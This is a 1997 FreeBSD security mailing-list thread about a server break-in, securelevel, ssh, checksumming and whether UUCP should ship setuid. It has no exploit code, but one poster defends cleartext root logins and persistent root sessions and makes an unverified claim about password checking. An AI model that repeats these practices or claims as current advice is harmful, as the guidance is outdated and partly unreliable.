1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA18228 for security-outgoing; Tue, 29 Jul 1997 15:44:56 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA18223 for ; Tue, 29 Jul 1997 15:44:52 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA11547; Tue, 29 Jul 1997 15:44:45 -0700 (PDT) Date: Tue, 29 Jul 1997 15:44:45 -0700 (PDT) From: Vincent Poy To: John-David Childs cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, John-David Childs wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =) =)> On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)> =)> =)Hrm if you always use kill -9 try the reverse, just a kill or a kill -15 =)> =)> I did that too. even kill -HUP only kills the master process. I =)> had to kill the child process manually. =) =)That's what the killall script is for :-) I know =) But as long as I kill the processes, it wouldn't matter how I killed it anyways. =)Since I've finally plowed through the dozens (hundreds? ;-) of messages on =)the subject... So much I was like always 2 hours behind ;-( =)None of my FreeBSD systems have ever installed a /root/.rhosts file to my =)knowledge, unless it's been a zero length file. I'd have to grok the =)scripts, but I know for a fact that a FreeBSD install wouldn't know to =)create a /root/.rhosts that had the name of your other machine in it. =)Some one of your admins did that luser trick (e.g. to enable rsh/rcp). I know that after I was looking at the machine. It seems like when the owner had FreeBSD since whatever version came out in 1994, none of us were running the machines until Summer 1996 so when our accounts were created, it came with a .rhosts file. Isn't rsh enabled by default in inetd.conf? =)Second, my interpretation of the init man page suggests that securelevel 1 =)would PREVENT me from writing to mounted disks at the time the securelevel =)1 is "invoked". So, for instance, if I used sysctl to change =)kern.securelevel from 0 to 1 *right now*, my server processes (httpd, =)sendmail, etc.) would suddenly blow up because they couldn't write to the =)disks. Thus, the only time one would want to invoke securelevel 1 would be =)from /etc/rc before the disks are mounted. Correct??? True. =)(The rest is dribble mostly directed to Vince, but possibly useful to =)others). =) =)Third, Vince stated something to the effect that Jordan Hubbard couldn't =)hold a candle to this hacker ("wasn't in the same league") and then posted =)IRC dribble. I'd bet this hacker couldn't hold a candle to Jordan and =)probably is just an luser with a copy of rootkit. (Just had to get that one =)off my mind ;) My apologies to Jordan but I was not saying it was a FreeBSD problem all by itself. I as well as others know that FreeBSD is known to be a very solid system. Back in the old days in 1991 before there was FreeBSD, 386bsd was out but Linux seemed to be better at that time so I ran it and even then, as long as the user had a shell account, he just ran vi and then used virecover and he got root on the machine. I tried the same trick and it worked too. So it isn't always the core of the OS itself. Remember FreeBSD from 1.0 all the way to 1995 didn't really have security problems. During 1996 and 1997, FreeBSD security has sent more than a few dozens worth of things that are vulnerable. mount msdos and suidperl were among things that lots of people didn't know about before. Last year, we were watching a hacker telnet into a FreeBSD machine as root with the letmein password and we tried it and it worked. One can always write code that would corrupt the system in some way. Remember I did say that this user complained about perl not working so I upgraded to perl5.00401 from perl5.003 which already has a security hole as pretty much everyone knows. After the perl update was when all of this happened. I could understand how he hacked mercury.GAIANET.NET since he had a account from there to begin with. But earth.GAIANET.NET, he absolutely had no access to in the first place. And even if he sniff, he would never get the root password correct in the first place. I noticed one thing about 2.1.7R's password encrytion that beats 2.2 and -CURRENT is that if you had the number 1234567890 for the root password in 2.1.7R, you had to type the thing the same way 100% or it will say sorry when you try to su. With 2.2R and above, I have tried and verify this on a complete new machine that you can change the 0 at the end to any number and you will still get root access. What I was basically trying to say was that Jordan is still one of the best in making a fine solid OS but remember that there is a old saying of breaking something is easier than fixing it. It takes just 10 seconds for a earthquake to destroy your house but it takes way more than that to rebuild it. =)Fourth, you might as well take that machine off the net (turn it off) if =)you can't get physical access to it for 2-4 months. It's gone gone gone! The machine has been off even before you wrote that message ;-) =)If you've been telnetting to it forever with no encryption, tcpwrappers, or =)router filters, your hacker could have been on your system for weeks or =)months before acting up and you wouldn't have a clue... We had always ran tcpwrappers as well as indentd to verify who and where each person is coming in from as well as constantly check all processes every few minutes including the ones running in the background. The router filters would need some time to learn since it is a FreeBSD based box and I don't want to do anything that will lock everyone out since that would defeat the purpose of having a filter. Besides, the hacker didn't know I was logged in to the machine with 10 shells in the first place since he only saw one of my un-hidden shells and try to write me there when he was actively talking to jbhunt. I was tracking him down in another pty which he deleted netstat already and didn't know I can replace it and track him down so fast and then added a route to reject all packets from his ppp connection. We even shut down the machine and disable everything in inetd.conf except telnet since we need to get back in but that still didn't stop him when he came back from another connection and just messed netstat up this time by caching netcom's DNS on his own machine. =)A few years ago when I was a weenie (ok, I still am compared to Jordan =)and Nate and... ;-) I challenged (deliberately) some of my more clueful =)customers to hack me...one of them was root on my system for almost a =)month before I noticed suspicious activity. Your descriptions of =)comparing files between machines (e.g. comparing byte sizes/dates of =)telnetd) suggest that you never ran anything like tripwire/cops to =)compute checksums of the files. Thus, you'd have NO clue which files =)really might have been changed. And if you DID run Tripwire before the =)hacker, and ran it again after the hacker, but didn't compare the result =)to a known clean OFFLINE copy of the tripwire database (e.g. a =)paper/floppy copy)...forget it! :) There would be no way to compare checksums of files anyways since these machines were both running -CURRENT and each revision of -CURRENT would have different checksums anyways. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 15:47:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA18407 for security-outgoing; Tue, 29 Jul 1997 15:47:00 -0700 (PDT) Received: from j51.com (root@gorplex.j51.com [199.224.7.51]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA18392 for ; Tue, 29 Jul 1997 15:46:53 -0700 (PDT) Received: from localhost (aaronb@localhost) by j51.com (8.8.5/8.8.5) with SMTP id SAA09822; Tue, 29 Jul 1997 18:45:10 -0400 (EDT) Date: Tue, 29 Jul 1997 18:45:10 -0400 (EDT) From: Aaron Bornstein To: Vincent Poy cc: freebsd-security@FreeBSD.ORG Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk [Cc list trimmed, I'm assuming most of those people are on the list -- AB] On Tue, 29 Jul 1997, Vincent Poy wrote: > You would think your toaster is unhackable. So is a Leica camera > lens but they still have ways to hack it. Also, just for your > information, the root password isn't even used that often. It is only > used every time the machine boots up since I run screen and I am connected > 24 x7 and reattach the screen session when necessary. > Great, now you've effectively given everyone who sniffs your connection instant root access, no extra passwords necessary. Using screen in this manner merely opens another path to root, through an account not afforded anywhere near the same protection by the operating system. > another machine and tracked him down and killed his connection. jbhunt > was running a portscanner to check for any daemons running on a higher > port number but didn't find any. > Don't forget the possibility of an exisiting daemon (such as telnetd or ftpd) being modified slightly to allow remote access root access to a certain site or (more likely) anyone who presents the proper backdoor phrase/environment variable. [I believe JKH mentioned this already] > True but the problem is we wished we had console access. If we > did, none of this would even happened I think. > Bullshit. If console access was available, the only portion of this process that would be made easier is the cleanup. Console access does not significantly raise your chances of -preventing- attacks. --Aaron From owner-freebsd-security Tue Jul 29 15:54:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA19014 for security-outgoing; Tue, 29 Jul 1997 15:54:52 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA19009 for ; Tue, 29 Jul 1997 15:54:47 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA11593; Tue, 29 Jul 1997 15:54:41 -0700 (PDT) Date: Tue, 29 Jul 1997 15:54:40 -0700 (PDT) From: Vincent Poy To: Aaron Bornstein cc: freebsd-security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Aaron Bornstein wrote: =)[Cc list trimmed, I'm assuming most of those people are on the list -- AB] =) =) Great, now you've effectively given everyone who sniffs your =)connection instant root access, no extra passwords necessary. Using =)screen in this manner merely opens another path to root, through an =)account not afforded anywhere near the same protection by the operating =)system. If someone was sniffing my connection, then why weren't any of my screen sessions touched? I spend more time on the computer than most people would. As everyone knows, I only sleep 2-3 hours per day. =)> another machine and tracked him down and killed his connection. jbhunt =)> was running a portscanner to check for any daemons running on a higher =)> port number but didn't find any. =)> =) Don't forget the possibility of an exisiting daemon (such as =)telnetd or ftpd) being modified slightly to allow remote access root =)access to a certain site or (more likely) anyone who presents the proper =)backdoor phrase/environment variable. [I believe JKH mentioned this =)already] That is always a possibility ofcourse. Or they can install some daemon at a port. =)> True but the problem is we wished we had console access. If we =)> did, none of this would even happened I think. =)> =) Bullshit. If console access was available, the only portion of =)this process that would be made easier is the cleanup. Console access =)does not significantly raise your chances of -preventing- attacks. If console access was available, how would the sniffer sniff the console? since that would not go through the network in the first place. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 16:00:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA19433 for security-outgoing; Tue, 29 Jul 1997 16:00:52 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA19428 for ; Tue, 29 Jul 1997 16:00:49 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA11622; Tue, 29 Jul 1997 16:00:40 -0700 (PDT) Date: Tue, 29 Jul 1997 16:00:38 -0700 (PDT) From: Vincent Poy To: sthaug@nethelp.no cc: freebsd-security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: <5883.870215424@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997 sthaug@nethelp.no wrote: =)[cc list trimmed] =) =)> I was considering installing ssh but there is only one problem. =)> I use Win95 from my own side at times for various reasons as well as =)> the other remote admins. So a ssh client does cost money. We're =)> volunteers and are not getting paid in any shape or form. =) =)The ssh client for Windows is $99. Educational sites are eligible for a =)50% discount. Or you could run the FreeBSD version - for free. We're not a Educational site and are not getting paid by GaiaNet. We voluntarily help admin the machines remotely. I know the FreeBSD version is free but I am not always accessing the machines from the same physical location. =)It sounds like you're saying that the extra hassle you and your fellow =)system administrators (and your users) are having because of the breakin =)is worth less that $99. Are you sure you have your priorities straight? =) =)(For comparison - I run ssh for practically *all* remote logins, even =)on the same LAN. ssh won't solve all your security problems, but it can =)be an important *part* of better security.) And once again, note that we volunteer for GaiaNet, none of the money GaiaNet makes goes to us as admins. Even phone calls to track down hackers come out of our own pockets. Besides, the decision for the $99 spent is out of our own hands since we down own GaiaNet. only the owners have the power of say of what to buy and not buy. =)With respect to passwords, your goal should be that no password is sent =)in the clear. Ever. This is difficult to reach, but you'll find it helps =)you to focus on security quite a bit. This has nothing to do with us but the way things were designed originally. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Tue Jul 29 17:32:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA24529 for security-outgoing; Tue, 29 Jul 1997 17:32:00 -0700 (PDT) Received: from tok.qiv.com ([204.214.141.211]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA24511 for ; Tue, 29 Jul 1997 17:31:58 -0700 (PDT) Received: (from uucp@localhost) by tok.qiv.com (8.8.6/8.8.5) with UUCP id TAA08116; Tue, 29 Jul 1997 19:30:28 -0500 (CDT) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.6/8.8.5) with SMTP id TAA00636; Tue, 29 Jul 1997 19:29:49 -0500 (CDT) X-Authentication-Warning: acp.qiv.com: jdn owned process doing -bs Date: Tue, 29 Jul 1997 19:29:49 -0500 (CDT) From: "Jay D. Nelson" To: Adam Shostack cc: robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707291250.IAA12447@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Sorry -- I guess I'm old fart hold outs. I use uucp and many of my clients use uucp. From what I see, UUCP use is growing even though these machines never show up in the maps. I think uucp will grow even more. Perhaps the best approach, if you really want to take it out of the standard distribution, is to make it an option at install time. Those that don't know what it is won't install it anyway. Idiots will blow their feet of no matter how hard you try to protect them. All you will accomplish, if you take it out of the distribution, is force the idiots to use rm * instead and force me to go to MIT to get and install UUCP. -- Jay On Tue, 29 Jul 1997, Adam Shostack wrote: ->Robert Watson wrote: ->| On Mon, 28 Jul 1997, Adam Shostack wrote: ->| ->| > Vincent Poy wrote: ->| > ->| > su really should be setuid. Everything else is debatable. My ->| > advice is to turn off all setuid bits except those you know you need ->| > (possibly w, who, ps, ping, at, passwd) -> ->| Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) ->| require root access to delivery to local mailboxes; crontab related stuff, ->| terminal locking, some kerberos commands, local XWindows servers, and su ->| all rely on suid. -> ->I know no one who still runs uucp. There are a few holdouts, but most ->systems can leave uucp off with no pain. Ditto with kerberos. :) -> ->Adam -> ->-- ->"It is seldom that liberty of any kind is lost all at once." -> -Hume -> -> From owner-freebsd-security Tue Jul 29 18:10:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA26375 for security-outgoing; Tue, 29 Jul 1997 18:10:37 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA26360 for ; Tue, 29 Jul 1997 18:10:30 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id VAA16708; Tue, 29 Jul 1997 21:06:39 -0400 (EDT) From: Adam Shostack Message-Id: <199707300106.VAA16708@homeport.org> Subject: Re: security hole in FreeBSD In-Reply-To: from "Jay D. Nelson" at "Jul 29, 97 07:29:49 pm" To: jdn@qiv.com (Jay D. Nelson) Date: Tue, 29 Jul 1997 21:06:39 -0400 (EDT) Cc: adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Let me be clear; I don't have anything against UUCP users, but most people don't need it turned on. Since its parts of it are setuid, (and thus potential security holes) I think its a reasonable to suggest that it ship either not setuid or as an install option. Yes idiots will hurt themselves. Should we try to make FreeBSD reasonably secure? I think so. I think a good metric to use is don't install uncommon services by default, require some action to turn them on. Adam Jay D. Nelson wrote: | Sorry -- I guess I'm old fart hold outs. I use uucp and many of my clients | use uucp. From what I see, UUCP use is growing even though these machines | never show up in the maps. I think uucp will grow even more. | | Perhaps the best approach, if you really want to take it out of the | standard distribution, is to make it an option at install time. Those that | don't know what it is won't install it anyway. | | Idiots will blow their feet of no matter how hard you try to protect them. | All you will accomplish, if you take it out of the distribution, is | force the idiots to use rm * instead and force me to go to MIT to get | and install UUCP. | | -- Jay | | On Tue, 29 Jul 1997, Adam Shostack wrote: | | ->Robert Watson wrote: | ->| On Mon, 28 Jul 1997, Adam Shostack wrote: | ->| | ->| > Vincent Poy wrote: | ->| > | ->| > su really should be setuid. Everything else is debatable. My | ->| > advice is to turn off all setuid bits except those you know you need | ->| > (possibly w, who, ps, ping, at, passwd) | -> | ->| Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) | ->| require root access to delivery to local mailboxes; crontab related stuff, | ->| terminal locking, some kerberos commands, local XWindows servers, and su | ->| all rely on suid. | -> | ->I know no one who still runs uucp. There are a few holdouts, but most | ->systems can leave uucp off with no pain. Ditto with kerberos. :) -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Tue Jul 29 18:14:09 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA26536 for security-outgoing; Tue, 29 Jul 1997 18:14:09 -0700 (PDT) Received: from eyelab.psy.msu.edu (eyelab.psy.msu.edu [35.8.64.179]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA26526 for ; Tue, 29 Jul 1997 18:14:02 -0700 (PDT) Received: from default (pm131-00.dialip.mich.net [35.9.14.191]) by eyelab.psy.msu.edu (8.8.6/8.8.5) with SMTP id VAA01876 for ; Tue, 29 Jul 1997 21:08:01 -0400 (EDT) Message-Id: <3.0.3.32.19970729211037.006c2180@eyelab.msu.edu> X-Sender: root@eyelab.msu.edu X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Tue, 29 Jul 1997 21:10:37 -0400 To: freebsd-security@freebsd.org From: Gary Schrock Subject: Re: security hole in FreeBSD In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > There would be no way to compare checksums of files anyways since >these machines were both running -CURRENT and each revision of -CURRENT >would have different checksums anyways. Now that one I have to disagree with. It's trivial to use something like mtree to set up your own set of files with checksums. And probably well worth the effort. Gary Schrock root@eyelab.msu.edu From owner-freebsd-security Tue Jul 29 18:14:41 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA26568 for security-outgoing; Tue, 29 Jul 1997 18:14:41 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA26562 for ; Tue, 29 Jul 1997 18:14:32 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id VAA16730; Tue, 29 Jul 1997 21:11:23 -0400 (EDT) From: Adam Shostack Message-Id: <199707300111.VAA16730@homeport.org> Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: from Robert Watson at "Jul 28, 97 03:29:43 pm" To: robert+freebsd@cyrus.watson.org Date: Tue, 29 Jul 1997 21:11:23 -0400 (EDT) Cc: security@FreeBSD.ORG, adam@homeport.org, rgrimes@GndRsh.aac.dev.com, dholland@eecs.harvard.edu X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Robert Watson wrote: | Is there any concensus on the use of DNSsec in the network community, as | it has not yet been made widely available (or at least, it is available, | but not largely used.) The key namespace here could be used however one | desired, nor necessarily in a DNS-style way. The entity-name, whatever | that is, simply suggests which key/algorithm should be used, a server | could be configured to pull that information from DNSsec, or from an | internal key-file (or both.) I don't trust the DNS right now. I also don't see a need to put keys there for local use. Use ssh to distribute them. :) | An ACK message has already been stated as desirable -- would a simple | signature over the last packet (or header + signature) using the shared | secret, entity public key, or whatever, back on the TCP connection | suffice? Maybe something lighter-weight? I'm leaning to acks being simpler than involving the last packet, and towords them involving just a sequence number: ACK log://somehost.evil.net:234566, HMAC Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Tue Jul 29 18:55:30 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA28667 for security-outgoing; Tue, 29 Jul 1997 18:55:30 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA28657 for ; Tue, 29 Jul 1997 18:55:26 -0700 (PDT) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.5/8.7.3) id LAA16359; Wed, 30 Jul 1997 11:24:28 +0930 (CST) From: Michael Smith Message-Id: <199707300154.LAA16359@genesis.atrad.adelaide.edu.au> Subject: Re: security hole in FreeBSD In-Reply-To: from "Jay D. Nelson" at "Jul 29, 97 07:29:49 pm" To: jdn@qiv.com (Jay D. Nelson) Date: Wed, 30 Jul 1997 11:24:28 +0930 (CST) Cc: adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Jay D. Nelson stands accused of saying: > Sorry -- I guess I'm old fart hold outs. I use uucp and many of my clients > use uucp. From what I see, UUCP use is growing even though these machines > never show up in the maps. I think uucp will grow even more. The ISP I feed from is making a lot of money selling UUCP email services to small and medium-sized businesses, often in conjunction with web hosting services. UUCP has a great deal more flexibility than using dialup POP or push-SMTP, and it's a winner in the "security" argument too. > Perhaps the best approach, if you really want to take it out of the > standard distribution, is to make it an option at install time. Those that > don't know what it is won't install it anyway. This is likely to happen with the next generation of installation software. -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Tue Jul 29 20:01:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA02170 for security-outgoing; Tue, 29 Jul 1997 20:01:35 -0700 (PDT) Received: from tok.qiv.com ([204.214.141.211]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA02165 for ; Tue, 29 Jul 1997 20:01:33 -0700 (PDT) Received: (from uucp@localhost) by tok.qiv.com (8.8.6/8.8.5) with UUCP id WAA08330; Tue, 29 Jul 1997 22:00:26 -0500 (CDT) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.6/8.8.5) with SMTP id VAA00857; Tue, 29 Jul 1997 21:58:24 -0500 (CDT) X-Authentication-Warning: acp.qiv.com: jdn owned process doing -bs Date: Tue, 29 Jul 1997 21:58:24 -0500 (CDT) From: "Jay D. Nelson" To: Adam Shostack cc: robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707300106.VAA16708@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Your point is well taken. That's why I suggested making it an install option very much like DES. I understand the risks with UUCP and, for the most part, tie it down to control access. Not all systems or networks are connected to the internet -- in fact, probably less than 50% are connected. In controlled environments, UUCP, rsh and all the traditional tools are quite useful. A knowledgeable Admin knows what needs to be done. There is no bullet proof system except the one turned off. Why cripple the experienced to protect the inexperienced? The beginners will learn, as we did, as they go along. -- Jay On Tue, 29 Jul 1997, Adam Shostack wrote: -> Let me be clear; I don't have anything against UUCP users, but ->most people don't need it turned on. Since its parts of it are ->setuid, (and thus potential security holes) I think its a reasonable ->to suggest that it ship either not setuid or as an install option. -> -> Yes idiots will hurt themselves. Should we try to make ->FreeBSD reasonably secure? I think so. I think a good metric to use ->is don't install uncommon services by default, require some action to ->turn them on. -> ->Adam -> ->Jay D. Nelson wrote: ->| Sorry -- I guess I'm old fart hold outs. I use uucp and many of my clients ->| use uucp. From what I see, UUCP use is growing even though these machines ->| never show up in the maps. I think uucp will grow even more. ->| ->| Perhaps the best approach, if you really want to take it out of the ->| standard distribution, is to make it an option at install time. Those that ->| don't know what it is won't install it anyway. ->| ->| Idiots will blow their feet of no matter how hard you try to protect them. ->| All you will accomplish, if you take it out of the distribution, is ->| force the idiots to use rm * instead and force me to go to MIT to get ->| and install UUCP. ->| ->| -- Jay ->| ->| On Tue, 29 Jul 1997, Adam Shostack wrote: ->| ->| ->Robert Watson wrote: ->| ->| On Mon, 28 Jul 1997, Adam Shostack wrote: ->| ->| ->| ->| > Vincent Poy wrote: ->| ->| > ->| ->| > su really should be setuid. Everything else is debatable. My ->| ->| > advice is to turn off all setuid bits except those you know you need ->| ->| > (possibly w, who, ps, ping, at, passwd) ->| -> ->| ->| Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc) ->| ->| require root access to delivery to local mailboxes; crontab related stuff, ->| ->| terminal locking, some kerberos commands, local XWindows servers, and su ->| ->| all rely on suid. ->| -> ->| ->I know no one who still runs uucp. There are a few holdouts, but most ->| ->systems can leave uucp off with no pain. Ditto with kerberos. :) -> ->-- ->"It is seldom that liberty of any kind is lost all at once." -> -Hume -> -> From owner-freebsd-security Tue Jul 29 20:17:42 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA03030 for security-outgoing; Tue, 29 Jul 1997 20:17:42 -0700 (PDT) Received: from tok.qiv.com ([204.214.141.211]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA03021 for ; Tue, 29 Jul 1997 20:17:38 -0700 (PDT) Received: (from uucp@localhost) by tok.qiv.com (8.8.6/8.8.5) with UUCP id WAA08348; Tue, 29 Jul 1997 22:15:26 -0500 (CDT) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.6/8.8.5) with SMTP id WAA00890; Tue, 29 Jul 1997 22:11:20 -0500 (CDT) X-Authentication-Warning: acp.qiv.com: jdn owned process doing -bs Date: Tue, 29 Jul 1997 22:11:19 -0500 (CDT) From: "Jay D. Nelson" To: Michael Smith cc: adam@homeport.org, robert+freebsd@cyrus.watson.org, vince@mail.MCESTATE.COM, security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707300154.LAA16359@genesis.atrad.adelaide.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Your choir is singing to my preacher. I've got no problem making UUCP optional. I would install it, though it would be totally overlooked by most new comers. Which is probably a good thing. I've had a few clients that wanted to do the SMTP thing on demand. Thankfully, after explaining what is involved, I haven't had to to that yet. -- Jay On Wed, 30 Jul 1997, Michael Smith wrote: ->Jay D. Nelson stands accused of saying: ->> Sorry -- I guess I'm old fart hold outs. I use uucp and many of my clients ->> use uucp. From what I see, UUCP use is growing even though these machines ->> never show up in the maps. I think uucp will grow even more. -> ->The ISP I feed from is making a lot of money selling UUCP email ->services to small and medium-sized businesses, often in conjunction ->with web hosting services. UUCP has a great deal more flexibility ->than using dialup POP or push-SMTP, and it's a winner in the ->"security" argument too. -> ->> Perhaps the best approach, if you really want to take it out of the ->> standard distribution, is to make it an option at install time. Those that ->> don't know what it is won't install it anyway. -> ->This is likely to happen with the next generation of installation ->software. -> ->-- ->]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ->]] Genesis Software genesis@gsoft.com.au [[ ->]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ->]] realtime instrument control. (ph) +61-8-8267-3493 [[ ->]] Unix hardware collector. "Where are your PEZ?" The Tick [[ -> From owner-freebsd-security Tue Jul 29 20:27:42 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA03433 for security-outgoing; Tue, 29 Jul 1997 20:27:42 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA03424 for ; Tue, 29 Jul 1997 20:27:36 -0700 (PDT) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.5/8.7.3) id MAA17737; Wed, 30 Jul 1997 12:55:47 +0930 (CST) From: Michael Smith Message-Id: <199707300325.MAA17737@genesis.atrad.adelaide.edu.au> Subject: Re: security hole in FreeBSD In-Reply-To: from "Jay D. Nelson" at "Jul 29, 97 10:11:19 pm" To: 